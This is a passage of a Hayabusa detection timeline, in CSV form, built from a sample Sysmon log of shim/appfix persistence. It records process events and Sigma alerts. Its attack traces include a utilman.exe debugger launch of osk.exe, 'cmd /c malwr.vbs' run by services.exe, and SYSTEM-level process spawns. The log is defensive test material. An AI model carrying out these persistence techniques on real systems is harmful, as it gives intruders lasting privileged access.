0x39e47fa | PID: 3688 | PGUID: 365ABB72-2550-5C91-0000-00101EE6CF05,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:22:24.901 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x39e47fa | PID: 4088 | PGUID: 365ABB72-2550-5C91-0000-00106CEACF05",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:22:40.373 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x39e47fa | PID: 3092 | PGUID: 365ABB72-2560-5C91-0000-0010C721DA05,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:26:03.585 +09:00,PC01.example.corp,1,info,,Process 
Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 4004 | PGUID: 365ABB72-262B-5C91-0000-0010B2566006,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:26:05.628 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x39e47fa | PID: 2792 | PGUID: 365ABB72-262D-5C91-0000-00108EA26106,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:31:03.687 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 3264 | PGUID: 365ABB72-2757-5C91-0000-0010A2B52A07,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:36:03.788 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 2056 | PGUID: 365ABB72-2883-5C91-0000-00101656F407,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:03.890 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | 
PID: 1756 | PGUID: 365ABB72-29AF-5C91-0000-0010B895C008,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:08.777 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1876 | PGUID: 365ABB72-29B4-5C91-0000-00108191C308",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:08.967 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.EXE /c malwr.vbs | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x39e47fa | PID: 3748 | PGUID: 365ABB72-29B4-5C91-0000-0010289AC308,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:08.977 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logoff | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x39e47fa | PID: 3488 | PGUID: 365ABB72-29B4-5C91-0000-0010999AC308,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:09.828 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x1 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 2384 | PGUID: 
365ABB72-29B5-5C91-0000-0010BE04C408",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:42:05.859 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe C:\Windows\system32\CompatTelRunner.exe | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 4012 | PGUID: 365ABB72-29ED-5C91-0000-00107271E808,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.238 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 360 | PGUID: 365ABB72-528C-5C91-0000-00104B4B0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.458 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 368 | PGUID: 365ABB72-528C-5C91-0000-0010644D0000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.699 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: 
\SystemRoot\System32\smss.exe 00000001 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 408 | PGUID: 365ABB72-528D-5C91-0000-00103B500000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.719 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 416 | PGUID: 365ABB72-528D-5C91-0000-001056500000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.759 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 428 | PGUID: 365ABB72-528D-5C91-0000-00109C500000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 484 | PGUID: 
365ABB72-528D-5C91-0000-001062560000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 500 | PGUID: 365ABB72-528D-5C91-0000-0010AD570000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.919 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsm.exe | Process: C:\Windows\System32\lsm.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 508 | PGUID: 365ABB72-528D-5C91-0000-0010DA570000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.929 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 516 | PGUID: 365ABB72-528D-5C91-0000-00100C580000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:12.931 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 632 | PGUID: 
365ABB72-528F-5C91-0000-001073780000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:13.151 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\VBoxService.exe | Process: C:\Windows\System32\VBoxService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 692 | PGUID: 365ABB72-528F-5C91-0000-0010ECB50000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:13.181 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 876 | PGUID: 365ABB72-528F-5C91-0000-00106BBE0000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:13.221 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1012 | PGUID: 365ABB72-5290-5C91-0000-001033D00000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.232 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1136 | PGUID: 
365ABB72-5290-5C91-0000-00104C100100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.563 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Tasks\SA.DAT | Process: C:\Windows\system32\svchost.exe | PID: 1036 | PGUID: 365ABB72-5290-5C91-0000-0010E6D10000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.603 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\spoolsv.exe | Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1416 | PGUID: 365ABB72-5292-5C91-0000-00101E310100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1532 | PGUID: 365ABB72-5292-5C91-0000-001036480100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.094 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Startup | Process: C:\Windows\System32\gpscript.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x3e7 | 
PID: 1616 | PGUID: 365ABB72-52A4-5C91-0000-0010A8560100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1628 | PGUID: 365ABB72-52B4-5C91-0000-0010355B0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-52B4-5C91-0000-0010D55B0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1676 | PGUID: 
365ABB72-52B4-5C91-0000-0010C25D0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1788 | PGUID: 365ABB72-52CE-5C91-0000-00106F720100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1820 | PGUID: 365ABB72-52CE-5C91-0000-00109D740100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.454 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Temp\wodCmdTerm.exe | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | PID: 1788 | PGUID: 
365ABB72-52CE-5C91-0000-00106F720100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1948 | PGUID: 365ABB72-52EC-5C91-0000-001027860100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 304 | PGUID: 365ABB72-5310-5C91-0000-001096A90100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 432 | PGUID: 
365ABB72-532B-5C91-0000-00100EB40100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.865 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 580 | PGUID: 365ABB72-5344-5C91-0000-001032BC0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1156 | PGUID: 365ABB72-5345-5C91-0000-001019C40100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1280 | PGUID: 
365ABB72-5366-5C91-0000-00109FCD0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1472 | PGUID: 365ABB72-5384-5C91-0000-0010F5D70100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.065 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1564 | PGUID: 365ABB72-53A2-5C91-0000-00101FE20100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1744 | PGUID: 
365ABB72-53A2-5C91-0000-001093E70100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1600 | PGUID: 365ABB72-53C0-5C91-0000-001044FC0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.436 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1904 | PGUID: 